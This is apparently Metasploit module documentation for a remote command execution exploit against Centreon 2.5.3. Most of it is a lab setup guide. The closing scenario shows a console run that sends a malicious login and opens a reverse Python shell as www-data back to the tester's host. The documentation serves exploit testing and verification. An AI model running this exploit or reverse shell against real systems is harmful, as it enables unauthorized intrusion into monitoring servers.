## Vulnerable Application

1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

### Creating A Testing Environment

Creating a testing environment for this application contained many steps, so I figured I would document the process here.

  1. Create a fresh install of Ubuntu 16.04.  I used a LAMP install. My user was `centreon`
  2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)
```
sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
sudo add-apt-repository ppa:ondrej/php
sudo apt-get install php5.6
sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
  select OK
  select No Configuration
sudo apt-get install snmp-mibs-downloader
```
  3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`
```
a2enmod php5.6
a2dismod php7.0
```
  4. Restart apache with `sudo apache2ctl restart`
  5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6.  The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
```
wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
tar xvf nagios-plugins-2.1.1.tar.gz
cd nagios-plugins-2.1.1/
./configure
make
sudo make install
```
  5.1 If during make, you get an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)
```
--- plugins/sslutils.c.orig   2016-01-14 20:02:06.419867000 +0100
+++ plugins/sslutils.c   2016-01-14 20:01:36.091492000 +0100
@@ -70,8 +70,13 @@
#endif
      break;
   case 3: /* SSLv3 protocol */
+#if defined(OPENSSL_NO_SSL3)
+      printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
+      return STATE_CRITICAL;
+#else
      method = SSLv3_client_method();
      ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
+#endif
      break;
   default: /* Unsupported */
      printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
```
  6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-clib
cd centreon-clib/build
cmake .
make
sudo make install
```
  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-broker
cd centreon-broker/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
  8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-engine
cd centreon-engine/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion.
```
sudo mkdir /var/log/centreon-engine
cd ~
sudo pear install XML_RPC-1.4.5
(may need to install php-xml)
wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
cd centreon-2.5.3
sudo ./install.sh -i
  <enter>
  q
  y
  y
  y
  y
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  <enter>
  <enter>
  centreon
  <enter>
  /var/log/centreon-engine
  /home/centreon/nagios-plugins-2.1.1/plugins
  <enter>
  /etc/init.d/centengine
  /usr/local/bin/centengine
  /usr/local/etc/
  /usr/local/etc/
  /etc/init.d/centengine
  <enter>
  y
  y
  y
  <enter>
  y
  <enter>
  <enter>
  y
  y
  <enter>
  y
  y
  <enter>
  y
  <enter>
  <enter>
  y
  y
```
  10. Fix apache config
```
sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
sudo a2enconf centreon
sudo service apache2 reload
```
  11. Configure via website.  Browse to <ip>/centreon
```
next
next
select centreon-engine
  /usr/local/lib/centreon-engine
  /usr/local/bin/centenginestats
  /usr/local/lib/centreon-engine
  /usr/local/lib/centreon-engine
  /usr/local/lib/centreon-engine
  next
select centreon-broker
  /usr/local/lib/centreon-broker
  /usr/local/lib/cbmod.so
  /usr/local/lib/centreon-broker
  /usr/local/lib/centreon-broker
  /usr/local/lib/centreon-broker
  next
Pick whatever details about your user you want, next
Fill in mysql Root password, next
next
next
finish
```
## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/linux/http/centreon_useralias_exec`
  4. Do: `set payload`
  5. Do: `set rhost`
  6. Do: `check`
  7. Do: ```run```
  8. You should get a shell.

## Scenarios

Just a standard run.
```
    msf > use exploit/linux/http/centreon_useralias_exec
    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
    payload => cmd/unix/reverse_python
    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
    rhost => 192.168.2.85
    msf exploit(centreon_useralias_exec) > set verbose true
    verbose => true
    msf exploit(centreon_useralias_exec) > check
    [+] Version Detected: 2.5.3
    [*] 192.168.2.85:80 The target appears to be vulnerable.
    msf exploit(centreon_useralias_exec) > exploit
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Sending malicious login
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
    whoami
    www-data
    uname -a
    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```
